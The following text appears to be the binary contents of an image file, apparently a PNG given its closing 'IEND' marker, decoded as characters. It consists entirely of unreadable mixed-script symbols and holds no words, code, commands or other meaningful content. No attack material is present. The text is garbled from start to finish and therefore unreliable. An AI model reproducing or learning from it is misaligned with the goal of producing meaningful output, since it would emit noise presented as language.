I~,誫{UWW뮻}_~YƍSMMMYχ֝waw\ďcxꩧtEƍկ_?۷5@u?1kNׯWzz/wy>}zj3 k(ٺuq_Zvf̘:~ ABQ&r|!%KҥKgԞ={<_X-z !CyFUUz~ ABQIIIjݺW$UXXDٳZ~ ABQƍecW$<(~<RSSvZujjjԧOZQu@4 8m&&&jԩg$ď1h ͟?_{768@g =@`)))5o6m3)ѣƌJ;wҿUTT /KZR{~a=@0o<*狔iFɶ[ˎ;T]]OX@?K.ۈxN pppppppppppppppppPfl߾] ,{ァk۶mڿo5BTӦMӴiӴ|r DB2e|An!Dy'tkΝ[A $***t5' "!駟oaDnΝ:t֭[gDШQ06qD;@ x M6v(PiizmZ4ew"@̴ixf [~-Fٱc&IZ2|n!?$@{[HTɏ#@hȎI# _m(F /6Z3z'\r,r!;w2Z3j=~GY7"I$iI.p_"?pN`y DD?: _  Gÿab7J !Bx@0 Bo cG@`1C[@0G @`0C_u V1 aCX>W ` | `!<S `"<. `#c`?cAC4 ?c p#~@0?:08&_MQ1J h#?/`7;I  q 7a wQ A 1 Hp !#<8/#@1Ul7=S=K.4Z?E_$i@!1!E4?`P_  @Bă10#: "aU,xbFY1 [n|n #'vEH:`xb #vD4Y hi.i&EΖv#O H4IŶ}:Ikh @tZRF#(tXҙzZ ?I3l7q@õ|ۍ1,GpuY Ꮿ@hJv#xxk$ v#9 5 }_$c S#=+"K{F*m7`#%H:NRSp6I?sIՖ{Ap$I$I:QRv2$Z @UJ*$]<FO4IENDB`